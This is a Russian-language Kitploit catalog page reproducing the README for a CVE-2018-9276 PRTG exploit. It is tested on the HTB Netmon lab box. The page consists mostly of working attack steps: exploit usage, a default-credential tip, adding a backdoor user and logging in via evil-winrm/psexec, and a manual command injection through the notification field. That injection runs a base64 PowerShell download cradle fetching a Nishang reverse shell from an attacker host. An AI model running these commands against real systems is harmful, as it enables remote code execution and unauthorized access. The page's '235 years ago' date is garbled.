Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (поддержка Python3) | Kitploit
Инструменты/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Генерация полезной нагрузкиЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (поддержка Python3)

Репозиторий
235 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Обратный шелл (поддержка Python3)

Зависимости

  • Impacket (версия для python3)
  • Netcat
  • Msfvenom

Использование

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. Учетные данные необходимы для выполнения эксплойта. Попробуйте учетные данные по умолчанию prtgadmin:prtgadmin. Возможно, стоит проверить базу данных или журналы, чтобы получить их. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Попробуйте --lport 445, если порт не занят.
  3. В коде есть несколько запутанных комментариев. Возможно, потребуются некоторые изменения.
  4. Может потребоваться несколько попыток для успеха. Перезагрузка целевой машины всегда хороший вариант. Особенно если ваша полезная нагрузка вызывает какие-то последствия.

Тестовое покрытие

HTB Netmon box

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Благодарности

Большое спасибо wildkindcc за версию на Python2 https://github.com/wildkindcc/CVE-2018-9276

Расширение знаний

Использование metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Удаленное выполнение кода

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Пример использования

Учетные данные необходимы для выполнения эксплойта. Сначала войдите и получите аутентифицированный cookie, чтобы добавить нового пользователя.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Войдите как новый пользователь через evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// или альтернативный psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Снимок экрана 2021-07-29 at 3 14 10 PM

Продвинутый ручной эксплойт без добавления нового пользователя

Заслуга принадлежит официальному руководству HTB
PoC: https://www.codewatch.org/blog/?p=453 Плюс использование SMB для получения обратного шелла https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

Если мы не хотим добавлять пользователя, для лучшей OPSEC мы можем получить обратный шелл. Однако из-за HTML-кодирования многие символы кодируются. Мы можем обойти это, используя выполнение PowerShell через base64. Нам нужно создать команду, закодированную в base64. Однако она должна быть в кодировке, которую использует Windows, т.е. UTF-16LE.

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Мы используем iconv для преобразования в целевую кодировку и выполним этот обратный шелл из Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Скачайте скрипт и добавьте команду echo в последнюю строку.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Теперь запустите простой HTTP-сервер и создайте новое уведомление.

root@kitploit:~
python3 -m http.server 80

Нажмите Setup > Account Settings > Notifications -> нажмите "Add new notification" в крайнем правом углу. Вызовите уведомление, нажав кнопку Bell.

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Снимок экрана 2021-07-29 at 4 08 01 PM

Скачать инструмент